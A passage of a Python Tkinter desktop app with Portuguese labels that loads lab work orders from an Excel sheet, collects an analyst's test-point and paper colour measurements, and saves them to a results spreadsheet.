analisedFos:\n\t\t\n\t\t\tregisteredFos.append(a.value)\n\t\t\tcomboBoxTextValues.append(a.value)\n\n\t\t\tregisteredFoNumberValues.append(a.value)\n\t\t\tfoNumberValues.append(a.value)\n\n\t\t\tregisteredArriveDateValues.append(b.value)\n\t\t\tarriveDateValues.append(b.value)\n\t\t\t\n\t\t\tregisteredArriveHourValues.append(c.value)\n\t\t\tarriveHourValues.append(c.value)\n\n\t\t\tregisteredDeliveringDateValues.append(d.value)\n\t\t\tdeliveringDateValues.append(d.value)\n\n\t\t\tregisteredDeliveringHourValues.append(e.value)\n\t\t\tdeliveringHourValues.append(e.value)\n\n\t\t\tregisteredDefectValues.append(f.value)\n\t\t\tdefectValues.append(f.value)\n\n\t\t\tregisteredTestTypeValues.append(g.value)\n\t\t\ttestTypeValues.append(g.value)\n\n\t\t\tregisteredNumberOfTestingPointsValues.append(h.value)\n\t\t\tnumberOfTestingPointsValues.append(h.value)\n\t\t\t\n\t\t\tregisteredRegisterValues.append(I.value)\n\t\t\tregisterValues.append(I.value)\n\n\t\t\tregisteredCommentValues.append(j.value)\n\t\t\tcommentValues.append(j.value)\n\n\t\t\tregisteredValuesList.append(k.value)\n\t\t\tvaluesList.append(k.value)\n\n\t\t\tregisteredIdValues.append(l.value)\n\t\t\tidValues.append(l.value)\n\n\telif l.value == None or l.value == \"\":\n\t\t# print(\"Lists Built...\")\n\t\tbreak\n\nwb.close()\n\n# print(f\"valuesList: {idValues}\")\nprint(f\"valuesList length: {len(idValues)}\")\n\n# print(\"Final List:\", valuesList)\n\n# print(\"Tests:\", testTypeValues)\n\n# close the db.xlsx, and open the results.xlsx\nwb.close()\n\nwb = load_workbook(\"results.xlsx\")\nresultSheet = wb[\"resultsSheet\"]\n\ndef saveTestResults():\n\tglobal foNumber\n\tglobal defect\n\tglobal testType\n\tglobal resultList\n\tglobal definedRow\n\tglobal emptyRow\n\n\tif testType != \"000-TESTES DE COR\":\n\n\t\tfor index in range(numberOfTestingPoints):\n\t\t\tresultList[index] = testingPointsEntryList[index].get()\n\t\t\n\t\tif analistNameEntry.get() != \"\":\n\t\t\n\t\t\tif testingPointsEntryList[index].get() != \"\" and testingPointsEntryList[0].get() != \"\":\t\t\n\t\t\t\tif definedRow == False:\n\t\t\t\t\tfor i in range(2,1048576):\n\t\t\t\t\t\t# 1048576 is the max number of rows in excel\n\t\t\t\t\t\tc = resultSheet.cell(row=i, column=1)\n\t\t\t\t\t\t\n\t\t\t\t\t\tif c.value == None or c.value == \"\":\n\t\t\t\t\t\t\temptyRow = i\n\t\t\t\t\t\t\tdefinedRow = True\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t# print('Got Empty Row...')\n\t\t\t\t# print('Empty Row:',emptyRow)\n\n\t\t\t\tdate = str(datetime.datetime.now().date().strftime(\"%d-%m-%Y\"))\n\t\t\t\ttime = str(datetime.datetime.now().time())\t\n\n\t\t\t\tresultSheet.cell(row=emptyRow, column=1).value = foNumber\t\n\t\t\t\tresultSheet.cell(row=emptyRow, column=2).value = defect\n\t\t\t\tresultSheet.cell(row=emptyRow, column=3).value = register[:16]\n\t\t\t\tresultSheet.cell(row=emptyRow, column=4).value = comment\n\t\t\t\tresultSheet.cell(row=emptyRow, column=5).value = idString\n\t\t\t\tresultSheet.cell(row=emptyRow, column=6).value = analistNameEntry.get()\n\t\t\t\tresultSheet.cell(row=emptyRow, column=7).value = str(getpass.getuser())\n\t\t\t\tresultSheet.cell(row=emptyRow, column=8).value = date + \" \" + time[:8]\n\t\t\t\tresultSheet.cell(row=emptyRow, column=9).value = testType\n\t\t\t\tresultSheet.cell(row=emptyRow, column=10).value = foTest\n\t\t\t\tresultSheet.cell(row=emptyRow, column=11).value = numberOfTestingPoints\n\n\t\t\t\tfor index in range(numberOfTestingPoints):\n\t\t\t\t\tcolumnPosition = index + 12\n\t\t\t\t\tresultSheet.cell(row=emptyRow, column=columnPosition).value = resultList[index]\n\n\t\t\t\t# print(resultList)\t\t\t\t\n\t\t\t\t\n\t\t\t\ttry:\n\t\t\t\t\twb.save(\"results.xlsx\")\n\t\t\t\t\tmessagebox.showinfo(\"Sucesso\", \"Resultados cadastrados com sucesso.\")\n\n\t\t\t\t\t# clearEntries\n\t\t\t\t\tfor i in range(numberOfTestingPoints):\n\t\t\t\t\t\ttestingPointsEntryList[i].delete(0, END)\t\t\t\t\n\n\t\t\t\t\tanalised.append(idString)\n\t\t\t\t\t\n\t\t\t\t\tother_index\t= idValues.index(idString)\n\n\t\t\t\t\tidValues.remove(idString)\n\n\t\t\t\t\tdel foNumberValues[other_index]\n\t\t\t\t\tdel arriveDateValues[other_index]\n\t\t\t\t\tdel arriveHourValues[other_index]\n\t\t\t\t\tdel deliveringDateValues[other_index]\n\t\t\t\t\tdel deliveringHourValues[other_index]\n\t\t\t\t\tdel defectValues[other_index]\n\t\t\t\t\tdel testTypeValues[other_index]\n\t\t\t\t\tdel numberOfTestingPointsValues[other_index]\n\t\t\t\t\tdel registerValues[other_index]\n\t\t\t\t\tdel commentValues[other_index]\n\t\t\t\t\tdel valuesList[other_index]\n\t\t\t\t\t\n\t\t\t\t\tdefinedRow = False\n\n\t\t\t\t\tprint(f\"Saved: valuesList length: {len(valuesList)}\")\n\t\t\t\t\t# print(idValues)\n\n\t\t\t\t\tgoBack()\t\n\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(e)\n\t\t\t\t\tmessagebox.showerror(\"Erro\", \"Não foi possível fazer o cadastro, a planilha está aberta em outro lugar.\\nFeche-a e tente novamente.\")\n\n\t\t\telse:\n\t\t\t\t# print(\"There is a test missing...\")\n\t\t\t\tmessagebox.showerror(\"Erro\", \"Preencha todos os campos.\")\t\n\n\t\telse:\n\t\t\tmessagebox.showerror(\"Erro\", \"Digite seu Nome.\")\n\t\n\telif testType == \"000-TESTES DE COR\":\n\n\t\tif analistNameEntry.get() != \"\":\n\n\t\t\tentriesList = [entryLuminTela.get(),\n\t\t\t\tentryCoordATela.get(),\n\t\t\t\tentryCoordBTela.get(),\n\t\t\t\tentryAlvuraISOTela.get(),\n\t\t\t\tentryBrancuraTela.get(),\n\t\t\t\tentryOpacidadeTela.get(),\n\t\t\t\tentryFluorescenciaTela.get(),\n\t\t\t\tentryAlvuraD65Tela.get(),\t\t\t\t\n\t\t\t\tentryLuminFeltro.get(),\n\t\t\t\tentryCoordAFeltro.get(),\n\t\t\t\tentryCoordBFeltro.get(),\n\t\t\t\tentryAlvuraISOFeltro.get(),\n\t\t\t\tentryBrancuraFeltro.get(),\n\t\t\t\tentryOpacidadeFeltro.get(),\n\t\t\t\tentryFluorescenciaFeltro.get(),\n\t\t\t\tentryAlvuraD65TelaFeltro.get()\t\t\t\t\n\t\t\t]\n\t\t\t\n\t\t\tif \"\" not in entriesList:\n\t\t\t\t\n\t\t\t\tif definedRow == False:\n\t\t\t\t\tfor i in range(2,1048576):\n\t\t\t\t\t\t# 1048576 is the max number of rows in excel\n\t\t\t\t\t\tc = resultSheet.cell(row=i, column=1)\n\t\t\t\t\t\t\n\t\t\t\t\t\tif c.value == None or c.value == \"\":\n\t\t\t\t\t\t\temptyRow = i\n\t\t\t\t\t\t\tdefinedRow = True\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\tdate = str(datetime.datetime.now().date().strftime(\"%d-%m-%Y\"))\n\t\t\t\ttime = str(datetime.datetime.now().time())\t\n\n\t\t\t\tresultSheet.cell(row=emptyRow, column=1).value = foNumber\t\n\t\t\t\tresultSheet.cell(row=emptyRow, column=2).value = defect\n\t\t\t\tresultSheet.cell(row=emptyRow, column=3).value = register[:16]\n\t\t\t\tresultSheet.cell(row=emptyRow, column=4).value = comment\n\t\t\t\tresultSheet.cell(row=emptyRow, column=5).value = idString\n\t\t\t\tresultSheet.cell(row=emptyRow, column=6).value = analistNameEntry.get()\n\t\t\t\tresultSheet.cell(row=emptyRow, column=7).value = str(getpass.getuser())\n\t\t\t\tresultSheet.cell(row=emptyRow, column=8).value = date + \" \" + time[:8]\n\t\t\t\tresultSheet.cell(row=emptyRow, column=9).value = testType \n\t\t\t\tresultSheet.cell(row=emptyRow, column=10).value = foTest\n\t\t\t\tresultSheet.cell(row=emptyRow, column=11).value = numberOfTestingPoints\n\n\t\t\t\tfor n in range(len(entriesList)):\n\t\t\t\t\tcolumnPosition = n + 42\n\t\t\t\t\tresultSheet.cell(row=emptyRow, column=columnPosition).value = entriesList[n]\n\t\t\t\t\n\t\t\t\ttry:\n\t\t\t\t\twb.save(\"results.xlsx\")\n\t\t\t\t\tmessagebox.showinfo(\"Sucesso\", \"Resultados cadastrados com sucesso.\")\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tanalised.append(idString)\n\n\t\t\t\t\tother_index\t= idValues.index(idString)\n\n\t\t\t\t\tidValues.remove(idString)\n\n\t\t\t\t\tdel foNumberValues[other_index]\n\t\t\t\t\tdel arriveDateValues[other_index]\n\t\t\t\t\tdel arriveHourValues[other_index]\n\t\t\t\t\tdel deliveringDateValues[other_index]\n\t\t\t\t\tdel deliveringHourValues[other_index]\n\t\t\t\t\tdel defectValues[other_index]\n\t\t\t\t\tdel testTypeValues[other_index]\n\t\t\t\t\tdel numberOfTestingPointsValues[other_index]\n\t\t\t\t\tdel registerValues[other_index]\n\t\t\t\t\tdel commentValues[other_index]\n\t\t\t\t\tdel valuesList[other_index]\n\t\t\t\t\t\n\t\t\t\t\tdefinedRow = False\n\n\t\t\t\t\tprint(f\"Saved: valuesList length: {len(valuesList)}\")\n\t\t\t\t\t# print(idValues)\n\n\t\t\t\t\tgoBack()\t\n\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(e)\n\t\t\t\t\tmessagebox.showerror(\"Erro\", \"Não foi possível fazer o cadastro, a planilha está aberta em outro lugar.\\nFeche-a e tente novamente.\\n\" + str(e))\n\t\t\t\t\t\t\t\n\t\t\telse:\n\t\t\t \tmessagebox.showerror(\"Erro\", \"Preencha todos os campos.\")\t\t\t\n\t\telse:\n\t\t\tmessagebox.showerror(\"Erro\", \"Digite seu Nome.\")\t\t\t\t\n\ndef goBack():\n\tglobal secondWindow\n\tglobal master_frame\n\tglobal foNumberBox\n\n\tif testType != \"000-TESTES DE COR\":\n\t\tfor i in range(numberOfTestingPoints):\n\t\t\ttestingPointsLabelList[i].destroy()\n\t\t\ttestingPointsEntryList[i].destroy()\n\n\telif testType == \"000-TESTES DE COR\":\n\t\t\n\t\tentryLuminTela.delete(0,END)\n\t\tentryCoordATela.delete(0,END)\n\t\tentryCoordBTela.delete(0,END)\n\t\tentryAlvuraISOTela.delete(0,END)\n\t\tentryOpacidadeTela.delete(0,END)\n\t\tentryFluorescenciaTela.delete(0,END)\n\t\tentryBrancuraTela.delete(0,END)\n\t\tentryAlvuraD65Tela.delete(0,END)\n\n\t\tentryLuminFeltro.delete(0,END)\n\t\tentryCoordAFeltro.delete(0,END)\n\t\tentryCoordBFeltro.delete(0,END)\n\t\tentryAlvuraISOFeltro.delete(0,END)\n\t\tentryBrancuraFeltro.delete(0,END)\n\t\tentryOpacidadeFeltro.delete(0,END)\n\t\tentryFluorescenciaFeltro.delete(0,END)\n\t\tentryAlvuraD65TelaFeltro.delete(0,END)\n\n\t\tentryLuminTela.grid_forget()\n\t\tentryCoordATela.grid_forget()\n\t\tentryCoordBTela.grid_forget()\n\t\tentryAlvuraISOTela.grid_forget()\n\t\tentryOpacidadeTela.grid_forget()\n\t\tentryFluorescenciaTela.grid_forget()\n\t\tentryBrancuraTela.grid_forget()\n\t\tentryAlvuraD65Tela.grid_forget()\n\t\tlabelLuminTela.grid_forget()\n\t\tlabelCoordATela.grid_forget()\n\t\tlabelCoordBTela.grid_forget()\n\t\tlabelAlvuraISOTela.grid_forget()\n\t\tlabelOpacidadeTela.grid_forget()\n\t\tlabelFluorescenciaTela.grid_forget()\n\t\tlabelBrancuraTela.grid_forget()\n\t\tlabelAlvuraD65Tela.grid_forget()\n\n\t\tentryLuminFeltro.grid_forget()\n\t\tentryCoordAFeltro.grid_forget()\n\t\tentryCoordBFeltro.grid_forget()\n\t\tentryAlvuraISOFeltro.grid_forget()\n\t\tentryBrancuraFeltro.grid_forget()\n\t\tentryOpacidadeFeltro.grid_forget()\n\t\tentryFluorescenciaFeltro.grid_forget()\n\t\tentryAlvuraD65TelaFeltro.grid_forget()\n\t\tlabelLuminFeltro.grid_forget()\n\t\tlabelCoordAFeltro.grid_forget()\n\t\tlabelCoordBFeltro.grid_forget()\n\t\tlabelAlvuraISOFeltro.grid_forget()\n\t\tlabelBrancuraFeltro.grid_forget()\n\t\tlabelOpacidadeFeltro.grid_forget()\n\t\tlabelFluorescenciaFeltro.grid_forget()\n\t\tlabelAlvuraD65TelaFeltro.grid_forget()\n\n\ttestLabel['text'] = \"\"\n\tarriveDateLabel1[\"text\"] = \"\"\n\tarriveHourLabel1[\"text\"] = \"\"\n\t\n\tdeliveringDateLabel1[\"text\"] = \"\"\n\tdeliveringDateLabel1[\"text\"] = \"\"\n\t\n\tdeliveringHourLabel1[\"text\"] = \"\"\t\n\tdeliveringHourLabel1[\"text\"] = \"\"\n\t\n\tdefectLabel1[\"text\"] = \"\"\n\ttestTypeLabel1[\"text\"] = \"\"\n\tnumberOfTestingPointsLabel1[\"text\"] = \"\"\n\tcommentLabel1[\"text\"] = \"\"\n\t\n\tfoNumberBox.set(\"\")\n\n\tanalyseButton['state'] = DISABLED\n\t\t\n\tsecondWindow.pack_forget()\n\tmaster_frame.pack()\n\ndef updateCombobox():\t\n\tglobal registeredFos\n\n\tglobal comboBoxTextValues\n\n\tglobal registeredFoNumberValues\n\tglobal foNumberValues\n\n\tglobal registeredArriveDateValues\n\tglobal arriveDateValues\n\t\n\tglobal registeredArriveHourValues\n\tglobal arriveHourValues\n\n\tglobal registeredDeliveringDateValues\n\tglobal deliveringDateValues\n\n\tglobal registeredDeliveringHourValues\n\tglobal deliveringHourValues\n\n\tglobal registeredDefectValues\n\tglobal defectValues\n\n\tglobal registeredTestTypeValues\n\tglobal testTypeValues\n\n\tglobal registeredNumberOfTestingPointsValues\n\tglobal numberOfTestingPointsValues\n\t\n\tglobal registeredRegisterValues\n\tglobal registerValues\n\n\tglobal registeredCommentValues\n\tglobal commentValues\n\n\tglobal registeredValuesList\n\tglobal valuesList\n\n\tglobal registeredIdValues\n\tglobal idValues\n\n\twb = load_workbook(\"db.xlsx\")\n\tws = wb[\"fosParaAnalise\"]\n\n\tfor z in range(2,1048576):\n\t\t# 1048576 is the max number of rows in excel\n\t\ta = ws.cell(row=z, column=1)\n\t\tb = ws.cell(row=z, column=2)\n\t\tc = ws.cell(row=z, column=3)\n\t\td = ws.cell(row=z, column=4)\n\t\te = ws.cell(row=z, column=5)\n\t\tf = ws.cell(row=z, column=6)\n\t\tg = ws.cell(row=z, column=7)\n\t\th = ws.cell(row=z, column=8)\n\t\tI = ws.cell(row=z, column=9)\n\t\tj = ws.cell(row=z, column=10)\n\t\tk = ws.cell(row=z, column=11)\n\t\tl = ws.cell(row=z, column=12)\n\t\t\n\t\tif l.value != None and l.value != \"\":\n\t\t\t\n\t\t\tif l.value not in analisedFos and l.value not in idValues and l.value not in analised:\n\t\t\t\tregisteredFos.append(a.value)\n\t\t\t\tcomboBoxTextValues.append(a.value)\n\n\t\t\t\tregisteredFoNumberValues.append(a.value)\n\t\t\t\tfoNumberValues.append(a.value)\n\n\t\t\t\tregisteredArriveDateValues.append(b.value)\n\t\t\t\tarriveDateValues.append(b.value)\n\t\t\t\t\n\t\t\t\tregisteredArriveHourValues.append(c.value)\n\t\t\t\tarriveHourValues.append(c.value)\n\n\t\t\t\tregisteredDeliveringDateValues.append(d.value)\n\t\t\t\tdeliveringDateValues.append(d.value)\n\n\t\t\t\tregisteredDeliveringHourValues.append(e.value)\n\t\t\t\tdeliveringHourValues.append(e.value)\n\n\t\t\t\tregisteredDefectValues.append(f.value)\n\t\t\t\tdefectValues.append(f.value)\n\n\t\t\t\tregisteredTestTypeValues.append(g.value)\n\t\t\t\ttestTypeValues.append(g.value)\n\n\t\t\t\tregisteredNumberOfTestingPointsValues.append(h.value)\n\t\t\t\tnumberOfTestingPointsValues.append(h.value)\n\t\t\t\t\n\t\t\t\tregisteredRegisterValues.append(I.value)\n\t\t\t\tregisterValues.append(I.value)\n\n\t\t\t\tregisteredCommentValues.append(j.value)\n\t\t\t\tcommentValues.append(j.value)\n\n\t\t\t\tregisteredValuesList.append(k.value)\n\t\t\t\tvaluesList.append(k.value)\n\n\t\t\t\tregisteredIdValues.append(l.value)\n\t\t\t\tidValues.append(l.value)\n\n\t\telif l.value == None or l.value == \"\":\n\t\t\tprint(\"Lists Rebuilt...\")\n\t\t\tprint(f\"valuesList length: {len(idValues)}\")\n\t\t\tbreak\n\n\twb.close()\n\n\ttestLabel['text'] = \"\"\n\tarriveDateLabel1[\"text\"] = \"\"\n\tarriveHourLabel1[\"text\"] = \"\"\n\t\n\tdeliveringDateLabel1[\"text\"] = \"\"\n\tdeliveringDateLabel1[\"text\"] = \"\"\n\t\n\tdeliveringHourLabel1[\"text\"] = \"\"\t\n\tdeliveringHourLabel1[\"text\"] = \"\"\n\t\n\tdefectLabel1[\"text\"] = \"\"\n\ttestTypeLabel1[\"text\"] = \"\"\n\tnumberOfTestingPointsLabel1[\"text\"] = \"\"\n\tcommentLabel1[\"text\"] = \"\"\n\t\n\t# print(\"This is the Final Values List:\", valuesList)\n\tfoNumberBox[\"values\"] = valuesList\n\t\ndef createTestResultEntriesWindow():\n\tglobal testingPointsLabelList\n\tglobal testingPointsEntryList\n\n\tmaster_frame.pack_forget()\n\tsecondWindow.pack()\t\t\t\n\n\tlabelColumn = 0\n\tentryColumn = 1\n\n\tbackButtonColumn = 0\n\tsaveButtonColumn = 1\n\tbuttonsColumnSpan = 1\n\n\tlabelEntryRow = 0\n\n\tbuttonsRow = 0\n\n\tfirstLabel = Label(secondWindow, text=\"Insira seu nome e os resultados da Análise.\")\n\tfirstLabel.grid(row=0, column=0, columnspan=2, padx=xpadding, pady=15)\n\n\tanalistNameLabel = Label(secondWindow, text=\"Insira seu Nome:\")\n\tanalistNameLabel.grid(row=1, column=0, padx=xpadding, pady=ypadding)\n\n\tanalistNameEntry.grid(row=1, column=1, padx=xpadding, pady=ypadding)\n\n\ttestLabel.grid(row=2, column=0, columnspan=2, sticky=W, padx=xpadding, pady=ypadding)\n\ttestLabel['text'] = \"Tipo de Analise: \" + testType\n\n\tif testType == \"000-TESTES DE COR\":\n\t\tprint(\"Teste de Cor...\")\n\t\t\n\t\tlabelLuminTela.grid(row=3, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryLuminTela.grid(row=3, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelCoordATela.grid(row=4, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryCoordATela.grid(row=4, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelCoordBTela.grid(row=5, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryCoordBTela.grid(row=5, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelAlvuraISOTela.grid(row=6, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryAlvuraISOTela.grid(row=6, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelBrancuraTela.grid(row=7, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryBrancuraTela.grid(row=7, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelOpacidadeTela.grid(row=8, column=0, sticky=W, padx=xpadding, pady=ypadding)\n\t\tentryOpacidadeTela.grid(row=8, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\n\t\tlabelFluorescenciaTela.grid(row=9, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryFluorescenciaTela.grid(row=9, column=1, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\t\n\t\tlabelAlvuraD65Tela.grid(row=10, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryAlvuraD65Tela.grid(row=10, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\n\t\tlabelLuminFeltro.grid(row=11, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryLuminFeltro.grid(row=11, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelCoordAFeltro.grid(row=12, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryCoordAFeltro.grid(row=12, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelCoordBFeltro.grid(row=13, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryCoordBFeltro.grid(row=13, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelAlvuraISOFeltro.grid(row=14, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryAlvuraISOFeltro.grid(row=14, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelBrancuraFeltro.grid(row=15, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryBrancuraFeltro.grid(row=15, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\n\t\tlabelOpacidadeFeltro.grid(row=16, column=0, sticky=W, padx=xpadding, pady=ypadding)\n\t\tentryOpacidadeFeltro.grid(row=16, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\n\t\tlabelFluorescenciaFeltro.grid(row=17, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryFluorescenciaFeltro.grid(row=17, column=1, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\t\n\t\tlabelAlvuraD65TelaFeltro.grid(row=18, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryAlvuraD65TelaFeltro.grid(row=18, column=1, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\n\t\tbuttonsRow = 19\n\n\telse:\t\n\t\tfor index in range(numberOfTestingPoints):\n\t\t\tif index+1 > 10:\n\t\t\t\tlabelColumn = 2\n\t\t\t\tentryColumn = 3\n\t\t\t\t\n\t\t\t\tbuttonsColumnSpan = 2\n\t\t\t\tsaveButtonColumn = 2\n\n\t\t\tif index+1 > 20:\n\t\t\t\tlabelColumn = 4\n\t\t\t\tentryColumn = 5\t\n\n\t\t\t\tbuttonsColumnSpan = 3\n\t\t\t\tsaveButtonColumn = 3\n\n\t\t\tif labelEntryRow >= 10:\n\t\t\t\tlabelEntryRow = 0\n\n\t\t\tlabelEntryRow += 1\t\n\n\t\t\tbuttonsRow += 5\n\n\t\t\tif index+1 >= 10:\n\t\t\t\tbuttonsRow = 13\t\t\n\t\t\t\n\t\t\tlabel = Label(secondWindow, text=\"P\"+str(index+1)+\":\")\n\t\t\ttestingPointsLabelList[index] = label\n\t\t\ttestingPointsLabelList[index].grid(row=labelEntryRow+2, column=labelColumn, sticky=W, padx=xpadding, pady=ypadding)\n\n\t\t\tentry = Entry(secondWindow)\n\t\t\ttestingPointsEntryList[index] = entry\n\t\t\ttestingPointsEntryList[index].grid(row=labelEntryRow+2, column=entryColumn, sticky=W, padx=xpadding, pady=ypadding)\n\n\t\tif labelColumn == 0:\n\t\t\tlabelColumn += 1\n\t\t\tentryColumn += 1\n\n\tbackButton.grid(row=buttonsRow, column=backButtonColumn, columnspan=buttonsColumnSpan, padx=xpadding, pady=15)\t\n\t\n\tsaveResultsButton.grid(row=buttonsRow, column=saveButtonColumn, columnspan=buttonsColumnSpan, padx=xpadding, pady=15)\n\t\t\t\ndef getFoProperties(event):\n\tglobal foNumber\n\tglobal arriveDate\n\tglobal arriveHour\n\tglobal deliveringDate\n\tglobal deliveringHour\n\tglobal defect\n\tglobal testType\n\tglobal foTest\n\tglobal numberOfTestingPoints\n\tglobal register\n\tglobal comment\n\tglobal idString\n\t\n\tindex = foNumberBox.current()\n\n\tif index != -1:\n\t\tfoNumber = foNumberValues[index]\n\t\tarriveDate = arriveDateValues[index]\n\t\tarriveHour = arriveHourValues[index]\n\t\tdeliveringDate = deliveringDateValues[index]\n\t\tdeliveringHour = deliveringHourValues[index]\n\t\tdefect = defectValues[index]\n\t\ttestType = testTypeValues[index]\n\t\tfoTest = valuesList[index]\n\t\tnumberOfTestingPoints = numberOfTestingPointsValues[index]\n\t\tregister = registerValues[index]\n\t\tcomment = commentValues[index]\n\n\t\tidString = idValues[index]\n\n\t\tarriveDateLabel1[\"text\"] = str(arriveDate)\n\t\tarriveHourLabel1[\"text\"] = str(arriveHour)\n\t\t\n\t\tif str(deliveringDate) == \"None\":\n\t\t\tdeliveringDateLabel1[\"text\"] = \"\"\n\t\telse:\t\t\n\t\t\tdeliveringDateLabel1[\"text\"] = str(deliveringDate)\n\t\t\n\t\tif str(deliveringHour) == \"None\":\n\t\t\tdeliveringHourLabel1[\"text\"] = \"\"\t\n\t\telse:\t\n\t\t\tdeliveringHourLabel1[\"text\"] = str(deliveringHour)\n\t\t\n\t\tdefectLabel1[\"text\"] = str(defect)\n\t\ttestTypeLabel1[\"text\"] = testType\n\t\tnumberOfTestingPointsLabel1[\"text\"] = str(numberOfTestingPoints)\n\t\tcommentLabel1[\"text\"] = comment\n\n\t\tanalyseButton[\"state\"] = NORMAL\n\n\telse:\n\t\t# print(\"Invalid Item on the Combobox\")\n\t\tmessagebox.showerror(\"Erro\", \"FO não existente.\")\n\n# Create all the widgets\nmaster_frame = Frame(root)\nmaster_frame.pack()\n\nxpadding = 5\nypadding = 3\n\nintroLabel = Label(master_frame, text=\"Selecione a FO para Análise.\")\nintroLabel.grid(row=0, column=0, columnspan=2, padx=xpadding, pady=15)\n\nfoNumberBoxLabel = Label(master_frame, text=\"Numero da FO:\")\nfoNumberBoxLabel.grid(row=1, column=0, sticky=W, padx=xpadding, pady=ypadding)\n\nfoNumberBox = ttk.Combobox(master_frame, postcommand=updateCombobox, width=25)\nfoNumberBox.bind(\"<>\", getFoProperties)\nfoNumberBox.grid(row=1, column=1, padx=xpadding, pady=ypadding)\n\narriveDateLabel = Label(master_frame, text=\"Data de Chegada:\")\narriveDateLabel.grid(row=2, column=0, sticky=W, padx=xpadding, pady=ypadding)\narriveDateLabel1 = Label(master_frame)\narriveDateLabel1.grid(row=2, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\narriveHourLabel = Label(master_frame, text=\"Hora de Chegada:\")\narriveHourLabel.grid(row=3, column=0, sticky=W, padx=xpadding, pady=ypadding)\narriveHourLabel1 = Label(master_frame)\narriveHourLabel1.grid(row=3, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\ndeliveringDateLabel = Label(master_frame, text=\"Data de Entrega:\")\ndeliveringDateLabel.grid(row=4, column=0, sticky=W, padx=xpadding, pady=ypadding)\ndeliveringDateLabel1 = Label(master_frame)\ndeliveringDateLabel1.grid(row=4, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\ndeliveringHourLabel = Label(master_frame, text=\"Hora da Entrega:\")\ndeliveringHourLabel.grid(row=5, column=0, sticky=W, padx=xpadding, pady=ypadding)\ndeliveringHourLabel1 = Label(master_frame)\ndeliveringHourLabel1.grid(row=5, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\ndefectLabel = Label(master_frame, text=\"Defeito:\")\ndefectLabel.grid(row=6, column=0, sticky=W, padx=xpadding, pady=ypadding)\ndefectLabel1 = Label(master_frame)\ndefectLabel1.grid(row=6, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\ntestTypeLabel = Label(master_frame, text=\"Tipo de Teste:\")\ntestTypeLabel.grid(row=7, column=0, sticky=W, padx=xpadding, pady=ypadding)\ntestTypeLabel1 = Label(master_frame)\ntestTypeLabel1.grid(row=7, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\nnumberOfTestingPointsLabel = Label(master_frame, text=\"Pontos de Analise:\")\nnumberOfTestingPointsLabel.grid(row=8, column=0, sticky=W, padx=xpadding, pady=ypadding)\nnumberOfTestingPointsLabel1 = Label(master_frame)\nnumberOfTestingPointsLabel1.grid(row=8, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\ncommentLabel = Label(master_frame, text=\"Observação:\")\ncommentLabel.grid(row=9, column=0, sticky=NW, padx=xpadding, pady=ypadding)\ncommentLabel1 = Label(master_frame, anchor=W, wraplength=130, justify=LEFT)\ncommentLabel1.grid(row=9, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\nanalyseButton = Button(master_frame, text=\"Analisar\", command=createTestResultEntriesWindow, state=DISABLED, width=10)\nanalyseButton.grid(row=10, column=0, columnspan=2, padx=xpadding, pady=15)\n\n# ///////////////////////////////////////////////////////////////////////////////////////////////////////\nsecondWindow = Frame(root)\t\n\ntestLabel = Label(secondWindow)\n\t\nanalistNameEntry = Entry(secondWindow)\n\nentryLuminTela = Entry(secondWindow)\nentryCoordATela = Entry(secondWindow)\nentryCoordBTela = Entry(secondWindow)\nentryAlvuraISOTela = Entry(secondWindow)\nentryBrancuraTela = Entry(secondWindow)\nentryOpacidadeTela = Entry(secondWindow)\nentryFluorescenciaTela = Entry(secondWindow)\nentryAlvuraD65Tela = Entry(secondWindow)\n\nlabelLuminTela = Label(secondWindow, text=\"Lumin. L - TELA:\")\nlabelCoordATela = Label(secondWindow, text=\"Coord. A - TELA:\")\nlabelCoordBTela = Label(secondWindow, text=\"Coord. B - TELA:\")\nlabelAlvuraISOTela = Label(secondWindow, text=\"Alvura ISO - TELA:\")\nlabelBrancuraTela = Label(secondWindow, text=\"Brancura - TELA:\")\nlabelOpacidadeTela = 